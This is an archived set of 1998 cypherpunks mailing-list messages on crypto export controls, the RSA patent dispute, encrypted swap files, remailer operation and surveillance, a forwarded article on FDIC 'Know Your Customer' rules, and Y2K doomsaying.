Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 30 Nov 1998 23:40:55 +0800
To: cypherpunks@toad.com
Subject: F.U.D. ... or "The Webmaster of this site is on more than weed"
Message-ID: <Pine.SOL.4.05.9811300940370.9780-100000@c00985-224wi.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Hi,

I came across a funny article about a "CIA, DEA, FBI, Lucent 
Technologies, Replay.com, Seed-bank.com Grand Conspiracy" at
http://members.tripod.com/~spookbusters/sunnysnooping.htm

Made for some interesting reading, and certain aspects of the 
site do merit discussion/investigation.

Regards,

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

_____________________________________________________________
Get Your Private, Free, Encrypted Email at http://www.nsa.gov


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNmKwiJDw1ZsNz1IXAQFV/Qf/TJLUEDFq8wJhgO7LLEAbBnwnZHm8jWjm
7J5KquhZXopBzZtTXb/GCitu7Wzo+MZZLi2UrtPysnyEJGgBBAqLN38NShwwS4bT
iwd5MyUW37l4Ha4S2rn3HdneVcJlHLn53y9f6xaMDyW1uXbbVtfDEdXCnFXO5In1
URraEyPeNCYvvj5n2gcUeePIK1N+zLHgyRcaaAgjpVWFo6/lV/51YuLbWtC7obqS
J76Ixeu1qbLV9LiYq4BsiBB8E+AemZ3Cq8U/8L1zjiUNxj5APgVG3QlNV1jjdO9H
t/8c0s602IcVJJYMZhhBs4eCNvIi1dpi5Hn7VeUxsKnANm8OwJm6Fg==
=GUk5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 30 Nov 1998 23:40:56 +0800
To: cypherpunks@toad.com
Subject: more FUD!
Message-ID: <Pine.SOL.4.05.9811300952150.10130-100000@c00985-224wi.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Interesting FUD-related thread on my message board that is tied in
to the mail i just sent...

http://www.genocide2600.com/~tattooman/wb/messages/1011.html

Regards,

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

_____________________________________________________________
Get Your Private, Free, Encrypted Email at http://www.nsa.gov


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNmKxg5Dw1ZsNz1IXAQFkfggAxXMR36cFDQj7drU1u2mqOrNyxIl9Ao0t
SwqmoRApPwZgfnS9AG4OvVFj4DZ/vcU0YQp+lNFdlJmP/xI4CpSN+8iKS03avYdD
IlasuNLV26bICpqy4cZvux1bZl2W3aaKyfPhK6nA27E83C+O3itiihqkPj/BW91Y
jgCF9acVGp/axdGqjtevxXEn2cF7jqR3XzekNTtYjOj1kKhTcto9B6eZzlFu1xBy
RHQa95t6SeIKsmXaEbAK0J+ztn5YomuLTT1knlZg0z3myCQ/FOuyy9/DPIU99ijv
mSaGoByccUH72/H0pTyUHhmSMYAW2tTQyWqJdKnHwMGcn7V5INa1Jg==
=EwZu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 1 Dec 1998 03:07:44 +0800
To: cypherpunks@Algebra.COM
Subject: Re: "Export" controls
Message-ID: <3662E37B.2ADC@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Export farce is just a neat way of scaring companies and individual
> contributors from developing and providing cryptographic systems 
> within US. 
>
100% accurate, but old, conclusions.

> Anyone providing domestic crypto runs the risk of violating EARs.
> Manufacturers are ultimately responsible when their products end up
> overseas...
>
Can you give me an example of a commercial vendor who has suffered
because someone bought a "dangerous" product ( Windows, for example ) at
retail and carried it out of the country in a suitcase? My guess would
be that anything sold at retail would pose no problem for the
manufacturer unless domestic regulations were in place. Even then the
retailer is the first in line for questioning.

> [ For example, try to buy one of IBM crypto-cards - give them a call
> and ask what does it take to purchase one with hard crypto on it
>
Save me the phone call and describe your experience. BTW - IBM derives a
large portion of its revenues from government contracts. They would be
pretty easy to convince. An non-dependant might be different.

> Would a US citizen have to produce ID in order to buy ?
>
Not until there are domestic regulations. Except for firearms,
cigarettes, alcohol and prescription drugs I can't think of any. My
guess would be that start-up manufacturers could get their tails twisted
long before the retail shelf:

Personal Audits
Business Audits
Supplier problems ( caused by similar techniques being threatened or
applied )
FCC EMI Test Delays and Failures
Credit Problems
Lots of Traffic Tickets for everyone.

It could be fun to try an embedded product. Make some development kits
then try to license it. Let a manufacturer with some resources handle
the heavy lifting. If you have trouble with that give 'em the bird -
just write a damn book, source, VHDL etc. You can even export that. My
favorites are:

Secure phone - I know it exists already but still fun

Disk encryptor - SCSI/EIDE, a bump in the wire between the motherboard
and the disk drive. With its own smartcard/keypad interface, keys are
never seen by OS. It doesn't solve the security problem while the system
is on but it sure as hell makes the disk useless to opponents once it
has been shut off. Good storage. Effectively shredded if you destroy the
smart card or forget the key. The proper way to keep your data as long
as the courts respect the Fifth Amendment.

Oh well,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sanford Whitehouse <sanford@lsil.com>
Date: Tue, 1 Dec 1998 06:30:50 +0800
To: hab@gamegirlz.com
Subject: Re: more FUD!
In-Reply-To: <36630035.92E6B606@gamegirlz.com>
Message-ID: <Roam.SIMC.2.0.6.912461615.1826.sanford@mhbs>
MIME-Version: 1.0
Content-Type: text/plain



> Hello.
> 
> First time poster.  Been reading for awhile now and I feel like a goof
> for having to ask, but what does FUD stand for anyway?
> 
> Thanks...
> 
> HaB
> 
> 

Fear, Uncertainty, and Doubt.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Tue, 1 Dec 1998 04:14:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dctest remailer - remailer@dragoncon.net
In-Reply-To: <199811300459.XAA05002@inferno.serversystems.net>
Message-ID: <3.0.3.32.19981130141527.03bf1130@rboc.net>
MIME-Version: 1.0
Content-Type: text/plain



Currently no encrypted email is apparently getting through the dctest
remailer.  I'll look into fixing the problem later.  Only non encrypted
remailer mail is working.

At 05:00 AM 11/30/98 -0000, dctest Anonymous Remailer wrote:
>A new remailer will be up for the next two weeks.  This is an attempt to
>play with and test the Win95 Reliable remailer software available at
>ftp://ftp.efga.org/privacy
>
>remailer@dragoncon.net is a Cypherpunk Type I remailer w/o Mix, which uses
>RSA keys.  The operator had problems getting the later key types to work
>properly.  Please send comments about the configuration and operation to
>admin@dragoncon.net
>
>
  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 1 Dec 1998 05:28:38 +0800
To: cypherpunks@cyberpass.net
Subject: Sternbot on RSA
Message-ID: <199811302026.OAA18677@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Vin has now cloned his vigorous defense of the RSA patent to several
Usenet newsgroups, posting his "summary" of the discussion.

Sternlight now leaps in, to add his two cents worth.

In talk.politics.crypto David Sternlight <david@sternlight.com> wrote:

> I simply cannot believe the post by Cordian below. His argument seem to
> be: 

Good morning, David.  We've missed you on the Cypherpunks List. 

> 1. I am right and the court is wrong.

No, David.  Vin's argument is that since the patents were upheld in court,
no knowlege of the specific algorithms or methods used to construct the
patented entity pre-dated the work which led to the patent. 

In point of fact, such things do not automatically invalidate patents. 
Certainly the concept of trapdoor functions, their cryptographic utility,
and that multiplication of primes was such a function, were known prior to
the development of the RSA Public Key Cryptosystem.  I vaguely recall that
encipherment by modular exponentiation has also been published as an
algorithm, albeit prior to the recognition that it had utility in
constructing public key systems. 

> 2. I vaguely recall a paper that might have been prior art.

Certainly the notion that the difficulty of factoring composites could
be employed in the construction of cryptographically useful things was
prior art.  The description of encryption by modular exponentiation I 
recall would have been additional prior art. 

> 3. It is disingenuous to say there has been no invalidating prior art
> even though the court has found the patent valid. 

There is a huge difference between "prior art" and "invalidating prior
art" under patent law.  Indeed, to invalidate the patent, it would have
been necessary not only to find a description of the mathematical methods
used in the construction of the RSA algorithm, but also a claim for the
specific use for secure communication over insecure data links. 

> 4. Cylink's arguments must be right even though they lost in court.

Some of Cylink's points were factually accurate.  A system which permits
the patenting of applied mathematics, which many engineers could have
independently derived, is hardly likely to stun us with a brilliant
interpretation of the various shades of meaning surrounding such claims
and counterclaims. 

Again, losing in court does not equate to ones facts being in error, any
more than it equates to the mathematics being patented being unknown prior
to their incarnation in the patented application.

> 5. RSA won because nobody could afford to litigate against them, even
> though Cylink did. 

RSADSI's aggressive litigation posture discouraged people from ignoring
their patent, and given that the patent could be licensed for much less
than a lengthy court fight, kept litigation to a minimum.  Cylink was
pretty much the sole exception to this, and that was a legal fight
internal to PKP.

> 6. Anyone can patent anything and nobody could afford to oppose them
> (N.B. Presumably not IBM, not DEC, not DuPont, ..oh well, you get the
> idea) 

Yes, David.  Practically anything can be patented.  The power of patents
is in defending them, not in applying for them, or in receiving them.

> 7. Rich, smart companies with big legal departments license bogus
> patents rather than litigating. 

Well, that depends on how you define bogus.  I consider patenting applied
math to be bogus.  Your mileage may vary. 

> 8. Someone who opposes me is a troll.

Someone who responds to a one line comment about the mathematical
underpinnings of RSA being previously known, with several multipage essays
whose central thesis is that such a claim cannot possible be true, because
the patent would have been invalidated by the courts, is a troll who
either understands nothing about how patents work, or is blowing a foghorn
on behalf of the patent holder.

> 9. If someone takes the time to oppose me, someone must be funding him.

Vin has already outed himself as someone who has done work for RSADSI.  He
has vociferously defended various key recovery schemes implemented in
their products against critics.  This, combined with his rabid insistance
that the RSA patent is something novel and unique, does equate to what
some of us might describe as a "vested interest" in the matter, directly
funded or not. 

> 10. The patent office never refuses patents on "method and apparatus"
> except in the case of perpetual motion machines. 

Patent examiners generally rely only upon the material presented with the
patent application when reviewing it, and expect people to do their own
searches, and correctly cite related patents.  Litigation is generally the
means by which patents are challenged, not by the patent office refusing
them, except in extrordinary circumstances, perpetual motion machines
being one well-known example. 

> 11. Security Dynamics is paying for those who oppose me.

I merely asked if Vin intended to bill them for the time he spent
writing his rants.  A rhetorical question. 

> 12. Such opposition is "a tirade".

Suggesting that I would have to retire my nym after criticizing the RSA
patent and taking several pages to say a paragraph of material certainly
qualifies as a tirade in my book, especially when combined with a lot of
irrelevent innuendo unrelated to the topic being discussed.

> 13. No corporations are buying products with GAK, key recovery, etc. 
> (N.B.  in That is what "no corporate demand" means). 

To an economist, perhaps.  It would be more accurate to say that demand as
a function of whether such features are included is a pretty flat
function. 

> 14. Someone who opposes stronger escrow/GAK/key recovery than RSA is
> offering must be suspect. 

Your point here eludes me.

> I could go on ...

And you usually do, and on, and on, and on...

> but it seems to me, knowing nothing about the parties involved and
> having no views on their personalities, that on the basis of the post
> below Cordian is uh, um, er, a few clauses short of a syllogism. 

I simply believe that patents on applied math are inappropriate.  Given
that they are allowed, it seems silly to cite the fact that the courts
uphold them as evidence for anything, particularly claims that they are 
new, novel, and non-obvious.

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Tue, 1 Dec 1998 04:14:50 +0800
To: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
In-Reply-To: <19981130180002.17576.qmail@nym.alias.net>
Message-ID: <19981130143320.A2756@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Nov 30, 1998 at 06:00:02PM -0000, lcs Mixmaster Remailer wrote:
> 
> But speaking of using passwords to protect data, how about an encrypted
> swapfile for a PC?  There are fast enough ciphers today that the virtual
> memory system could encrypt data as it swaps to the disk, and decrypt
> as it loads back into memory.  You'd type in the passphrase at boot time.

	Why the hell would you need a passphrase or any persistant security
for something transient like the swap ?   Might just as well choose a
completely random key (from /dev/urandom perhaps) and make every effort
to erase and forget it on system shutdown or crash.  In fact an algorithm
that initialized a crypto engine and then forgot the key used would
be ideal, provided only that it remains possible to recover blocks of
swap out of order from the order they were written in (they are quite
likely to get swapped back in a very different order than they were
written out, so simple stream ciphers are hard to use).

	There is nothing in a swapfile of value beyond an instantation
of the OS, except of course for snooping and debugging crashes.

	The only real hastle with doing this in real OS's is that the
swap may get initialized before a lot of randomness gets collected on
startup.   One might have to start encrypting swap after it was enabled
(but probably before much actual swapping).



-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Dec 1998 04:54:00 +0800
To: cypherpunks@cyberpass.net
Subject: Big Brother Banks? FDIC has snooping plans
Message-ID: <v04020a12b288a3deb732@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text

<snippetasnippeta>
>Big Brother Banks? FDIC has snooping plans
>By David M. Bresnahan
>Copyright 1998 WorldNetDaily.com
>
>
> Are you a potential criminal? Are you a threat to banks, airlines, a
>potential spy, or perhaps an IRS tax protester? The government
>would like to know and they are about to force banks to be their
>detectives.
>
>The federal government wants banks to investigate you. Soon your
>banker will know more about you than anyone else in town. Banks
>must not only determine your correct identity, they must also know
>how you make your money, and how you spend it. Once you
>establish a pattern of deposits and withdrawals, banks must inform
>federal agencies when you deviate.
>
>Bank customers may soon find themselves explaining to the FBI,
>Internal Revenue Service, and the Drug Enforcement Agency why
>they made a $15,000 deposit to their bank account. According to
>current Federal Deposit Insurance Corporation plans, banks will
>soon establish "profiles" of their customers and report deviations
>from those profiles.
>
>If you sell a car, for example, and place the proceeds in your
>account while you shop for a new one, a red flag may go off in the>bank
> computer. Such a situation puts law abiding citizens in a
>situation where they must prove they are innocent, says Scott
>McDonald of the watchdog group Fight the Fingerprint.
>
>An uproar from grass roots Americans is the only thing that will
>stop the current plans for the FDIC "Know Your Customer"
>program, according to McDonald. His organization has led the
>charge against the national ID, medical ID, and computerized
>information about private aspects of people's lives.
>
>A recent announcement by the FDIC provides for citizen comment
>prior to implementation of their new banking regulations. The
>deadline for comments is Dec. 27, 1998.
>
>"The FDIC is proposing to issue a regulation requiring insured
>nonmember banks to develop and maintain 'Know Your Customer'
>programs," according to a recent FDIC information package sent
>to Congress to provide notice of proposed rulemaking, and to
>banks for comment.
>
>"As proposed," the 29-page FDIC document begins, "the
>regulation would require each nonmember bank to develop a
>program designed to determine the identity of its customers;
>determine its customers' source of funds; determine the normal
>and expected transactions of its customers; monitor account
>activity for transactions that are inconsistent with those normal and
>expected transactions; and report anytransactions of its customers
>that are determined to be suspicious, in accordance with the
>FDIC's existing suspicious activity reporting regulation. By
>requiring insured nonmember banks to determine the identity of
>their customers, as well as to obtain knowledge regarding the
>legitimate activities of their customers, the proposed regulation will
>reduce the likelihood that insured nonmember banks will become
>unwitting participants in illicit activities conducted or attempted by
>their customers. It will also level the playing field between
>institutions that already have adopted formal 'Know Your
>Customer' programs and those that have not."
>
>Many banks across the country have already begun to implement
>such programs, according to the FDIC. A quick search of the
>Internet found many stories in press accounts of problems reported
>at such banks. There have been a number of stories dealing with
>banks requiring fingerprints to open accounts and to cash checks.
>There are several lawsuits presently underway testing the right of
>banks to make that requirement.
>
>McDonald has been fighting that issue, along with fingerprints on
>driver's licenses for some time. He pointed out the many errors
>found on credit reports and suggested that banks will soon make
>similar errors when they begin creating profiles of their customers.
>
>The FDIC is selling the planned regulations by pointing out the
>need for prevention of financial and other crime.
>
>"By identifying and, when appropriate, reporting such transactions
>in accordance with existing suspicious activity reporting
>requirements, financial institutions are protecting their integrity and
>are assisting the efforts of the financial institution regulatory
>agencies and law enforcement authorities to combat illicit activities
>at such institutions," says the FDIC.
>
>The proposed regulation is, according to FDIC spokesperson Carol
>A. Mesheske, authorized by current law. It comes from the
>statutory authority granted the FDIC under section 8(s)(1) of the
>Federal Deposit Insurance Act (12 U.S.C. 18189s)(1), as amended
>by section 259(a)(2) of the Crime Control Act of 1990 (Pub. L.
>101-647).
>
>The FDIC claims that the law requires them to develop regulations
>to require banks to "establish and maintain internal procedures
>reasonably designed to ensure and monitor compliance with the
>Bank Secrecy Act. Effective 'Know Your Customer' programs
>serve to facilitate compliance with the Bank Secrecy Act."
>
>The proposed regulations will mandate that all banks insured by
>the FDIC must maintain an intelligence gathering department that
>screens out customers and keeps an eye on existing customers.
>Before you decide to move your money to a credit union, you
>should know that the FDIC is not the only federal organization
>making such plans.
>
>"Each of the other Federal bank supervisory agencies is proposing
>to adopt substantially identical regulations covering state member
>and national banks, federally-chartered branches and agencies of
>foreign banks, savings associations, and credit unions. There also
>have been discussions with the Federal regulators of non-bank
>financial institutions, such as broker-dealers, concerning the need
>to propose similar rules governing the activities of these non-bank
>institutions," reports FDIC attorney Karn L. Main in the proposal.
>
>The purposes for the regulation are to protect the reputation of the
>banks, to facilitate compliance with the law, to improve safe and
>sound banking practices, and to protect banks from being used by
>criminals as a vehicle for illegal activities.
>
>Current customers will be subjected to the new regulation in the
>same way new customers will be scrutinized. The FDIC does not
>wish to permit any loop hole which would leave any bank
>customer unidentified or unsupervised.
>
>Each bank will create profiles. The first profile will determine the
>amount of risk a potential customer might present by opening an
>account. The system of profiling potential customers will be
>different from one bank to the next, since the FDIC does not
>provide a uniform program. The purpose of the profile is to
>identify potential customers who might use a bank account for
>funds obtained through criminal activity.
>
>The next profile will be one that is used by automated computers
>to determine when suspicious activity is taking place in an account.
>When activity in the account does not fit the profile, banks will
>notify federal authorities so they can investigate.
>
>Banks are expected to identify their customers, determine normal
>and expected transactions, monitor account transactions, and
>determine if a particular transaction should be reported.
>
>The FDIC has sent copies of the proposal to all banks and is
>asking for input. The questions asked by the FDIC in the proposal
>do not ask whether the regulations should be put into place, only
>how to implement them in the best way. None of the questions in
>the proposal are directed to bank customers.
>
>The FDIC reassures banks that because the requirements will be
>universally applied to all banks it will not hurt their business and
>drive away customers. The proposal does not mention penalties for
>non-compliance, nor is there any mention of regulations to provide
>access to bank records by customers so errors can be found and
>corrections made.
>
>"If 'Know Your Customer' programs are required, insured
>nonmember banks can more easily collect the necessary
>information because customers cannot turn readily to another
>financial institution free of such requirements," stated the proposal.
>
>Comments from the public may be sent to Robert E. Feldman,
>Executive Secretary, Attn: Comments/OES, Federal Deposit
>Insurance Corporation, 550 17th Street N.W., Washington, DC
>20429 or faxed to (202) 898-3838 or e-mailed to
>comments@FDIC.gov.
>
>--------------------------
>GunsSaveLives Internet Discussion List
>
>This list is governed by an acceptable use
>policy: http://www.wizard.net/~kc/policy.html
>or available upon request.
>
>To unsubscribe send a message to
>majordomo@listbox.com
>
>with the following line in the body:
>
>unsubscribe gsl
>
>GUNSSAVELIVES (GSL) IS A PRIVATE UNMODERATED LIST.
>THE OWNER TAKES NO RESPONSIBILTY FOR CONTENT. ALL
>RIGHTS RESERVED.
<snippage...>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HaB <hab@gamegirlz.com>
Date: Tue, 1 Dec 1998 05:23:49 +0800
To: cypherpunks@toad.com
Subject: Re: more FUD!
Message-ID: <36630035.92E6B606@gamegirlz.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello.

First time poster.  Been reading for awhile now and I feel like a goof
for having to ask, but what does FUD stand for anyway?

Thanks...

HaB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Parson <mparson@ocx.net>
Date: Tue, 1 Dec 1998 06:52:37 +0800
To: HaB <hab@gamegirlz.com>
Subject: Re: more FUD!
In-Reply-To: <36630035.92E6B606@gamegirlz.com>
Message-ID: <199811302158.PAA10066@fargo.ocx.net>
MIME-Version: 1.0
Content-Type: text/plain



In message <36630035.92E6B606@gamegirlz.com>, you write:
> Hello.
> 
> First time poster.  Been reading for awhile now and I feel like a goof
> for having to ask, but what does FUD stand for anyway?

Fear
Uncertainty
Doubt

-- 
Michael Parson
Sr. Systems Administrator
IXC Internet Services




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Tue, 1 Dec 1998 03:09:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
Message-ID: <19981130180002.17576.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote:

> Back in the mid-80s, Princeton University got some SDI money for the
> Massive Memory Machine Project, researching what you could do if
> you had enough memory for anything you wanted.  Even with the
> CS approaches of the time, you'd do a lot of things differently.
> Their non-massive toy machine was a 1.5MIPS VAX with 128MB RAM -
> which took 10 extension racks to hold all the RAM.
> These days 128MB is cheap, as are 500 MIPS P2s, but 50GB of RAM
> is still bigger than most machines' busses will hold,
> and even 2GB of DRAM is a lot bigger and more power-hungry than
> most laptops can really support, much less 2GB of fast SRAM.

There used to be a rule of thumb that you'd want roughly a megabyte
per megahertz.  Today, with our 200+ MHz processors, we tend to have
considerably less memory than this.  My Gateway PC from a couple of
years ago came with a 200 MHz Pentium Pro but only 32 MB of memory.

Most PCs today are not well balanced architecturally.  They should
really have a couple hundred megabytes of memory.  Memory is cheap
enough today that this can be added, but the motherboard configuration
may limit the amount.  If you had this much memory, swapping to disk
would be a smaller problem.

As for the idea of running without a disk drive, see the handheld PDAs
like the PalmPilot and the Microsoft WinCE machines.  The problem with
these from the security standpoint is that the memory is non-volatile.
With a PC, we don't worry too much about junk in memory because we turn
it off occasionally.  We are concerned about the disk because that is
where the persistent storage is.

But with a memory-only machine, you end up using your memory as a de-facto
disk drive, so that the contents of memory become just as sensitive as
the contents of disk would be on a PC.  Someone who gets hold of your
PDA can dump out memory and find sensitive data which is stored there.
Theoretically you can use a password to protect data, but then there are
tradeoffs between security and ease of use, and you may end up leaving
data exposed for extended periods.

But speaking of using passwords to protect data, how about an encrypted
swapfile for a PC?  There are fast enough ciphers today that the virtual
memory system could encrypt data as it swaps to the disk, and decrypt
as it loads back into memory.  You'd type in the passphrase at boot time.

This would solve the problem of sensitive data leaking onto the disk via
the swapfile.  There could still be traces in memory, but at least this
most obvious leak would be plugged.  You don't have to wait for apps to
be rewritten to use secure memory allocation drivers, you get the benefit
immediately.

Can existing encrypting-filesystem drivers be used for swapfiles?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 1 Dec 1998 09:25:53 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <19981130131031.26101.qmail@hotmail.com>
Message-ID: <v04011708b288dcbc4881@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:10 AM -0500 11/30/98, Martinus Luther wrote:

>*Real* rural life will continue of course, because people have the land
>and the skills to use it. And becauwse they tend to have stores. I don't
>know if it would be a very prosperous rural life for most people in the
>"developed" parts of the world though. I wonder what the sudden
>withdrawl of pesticides, herbicides, fertiliser, & fuel to fly the
>crop-sprayer would do to yields on the average American industrial farm?
>If the year 2000 is half as bad as North says it will be there will be a
>massive change in the balance of economic power away from North America
>and towards the so-called Third World.

	So true.

	All these would be rambo's with their Gas Guzzling SUV's, 4WD
Pickup Trucks, and 2 days supply of fuel stored up, and 4 months supply of
food right above their belt.

	Hell, half of 'em will die from heart attacks trying to get out of
the city.

>It looks like Gary North isn't really interested in the year 2000
>problem. What he is interested in seems to be guns. He's latched on to
>this issue because it allows him to think and write more about guns.
>And, like so many other gunwankers he seems to get off fantasising about
>the total collapse of civil society because that way he gets to feel
>good about his guns. All this obession with death and destruction is a
>bit strange in someone rumoured to be a Christian.

	Nah, a lot of christians are obsessed with Death & Destuction.

>Hey, maybe North is right about the USA. Maybe all the programmers will
>leave town to starve in the country. Maybe the systems will never get

	Not all. Most couldn't FIND the country.

>fixed. Maybe heavily armed gangs will take over the cities.  Maybe you
>never will rebuild your civilization.  I hope not. But if it does turn
>out that way we'll send you some foreign aid.

	Crap, if we go down, you will to.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Dec 1998 02:34:05 +0800
To: cypherpunks@Algebra.COM
Subject: custom protocol = job security
Message-ID: <199811301742.SAA04040@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 08:54 AM 11/30/98 -0600, Brown, R Ken wrote:
>> Dianelos Georgoudis[SMTP:dianelos@tecapro.com] described a security system
>
>If I was a bank I would be very wary of  proposals like "We would write our
>own transmission protocol. " That seems to introduce yet more complexity,

custom protocol = job security













  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Tue, 1 Dec 1998 10:05:29 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: Old Hat 2
In-Reply-To: <199811302325.AAA15856@replay.com>
Message-ID: <199812010116.TAA16536@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Anonymous wrote:
> 
> 
> Here's what is likely going on right now, though its
> availability to LE is questionable:
> 
> NSA probably maintains surveillance of all or nearly all
> encrypted remailers. They log and archive the content of
> all traffic. First arrivals of messages in the remailer
> "cloud" provide source identification in many cases, so

Well...

I just realized that the huge amount of spam that is being relayed
through remailers, might actually increase remailer security for
all of us. I understand that the remailer operators probably have
bandwidth limitations, but at least some spam is good.

Please do not fight spam as much as you do.

igor

> a database is gradually built of all the originating
> email addresses and IP addresses that have ever sent
> messages to a remailer. The same is true for the messages
> exiting the cloud, although many of those go to public
> lists or newsgroups. Sometimes, perhaps even often, the
> remailer cloud is so little utilised that one-hop or even
> multi-hop chained remalings are easily identified as to
> source and final destination. All goes into the database.
> Spook-style stylometers develop profiles of the users.
> Over time, more and more of the unidentified profiles
> become linked to known users. All it takes is one slip,
> or one piece of bad luck of low traffic levels. Linkage
> is also done on a probabilistic basis, many-to-many.
> Little human intervention is used except to develop and
> tune the correlation mechanisms. Filters aimed at content
> that might help correlate messages with senders is more 
> important to the spooks than Echelon Dictionary filters.
> The priorities in getting a handle on something like the
> remailer cloud are quite different than the priorities in
> scanning ordinary traffic for content. Ultimately, though,
> the regular content filters come into play, but in this
> ongoing exercise of cat and mouse, the bulk of the effort
> is directed at developing the combination of surveillance
> and intelligent processing that can provide the basis for
> identifying, at least to some knowable probability, the
> sources and destinations of given remailer messages.
> 
> Source and destination correlation can benefit greatly
> from knowledge of conventional email correspondent 
> relationships. Most nonprofessional-spook people who send 
> encrypted remailed email to a non-public destination are 
> also likely to correspond with that destination in the 
> clear. Archival logging of traffic is like a time machine -
> even if one ceases conventional correspondence with
> another, any past traffic can reveal the correspondence
> relationship.
> 
> Mathematical correlation, given a very large amount of raw
> data consisting of timestamped message events, can reveal
> quite a lot about likely correspondence relationships.
> Even given a remailer network full of chaff, with reordered
> message pools and such, just running correlations on the
> end point data - who sent and when, and who received and when
> - can develop likely correspondent pairs.
> 
> Be assured that the manipulation of such data relies heavily
> on probablistic clustering supported by database mechanisms
> not seen much in business environments. Instead of having
> firm relationships within an order or two of magnitude of
> the terminal node population, I would want something that
> allows having very large numbers of fuzzy relationships
> numbering many orders of magnitude greater than the node
> population. Nodes A, B, C and D send and receive remailer
> traffic. Everything that A has ever sent is clearly
> related to A, but each item can and likely would also
> have a probabilistic relationship to B, C, and D. The
> probability assignments would be updated as later analysis
> and later data more clearly identify who may have received 
> which messages. Content comes into play here, too.
> 
> At any time it is possible to query the database for
> the likely correspondents of A, and the likely messages
> A may have sent to B, C, or D, and get a result ordered
> by confidence. Similarly, it is possible to query for
> the likely sender(s) and recipient(s) of a given message.
> Occasionally, data may be firmed up - meaning achieving 
> higher confidence levels of the relationships - by access 
> to someone's PC, by whatever means, by stylometry, by 
> specific content of public messages, and by fortuitous 
> traffic analysis successes owing to the paucity of remailer 
> traffic.
> 
> It's also certain that to provide realistic cases that can
> be fully revealed to measure the efficacy of the various
> algorithms and methods involved, spooks use the remailer
> network themselves. That's the only way they can be sure
> to have any traffic that can be fully analyzed as a yardstick
> for the guessing games played by their software.
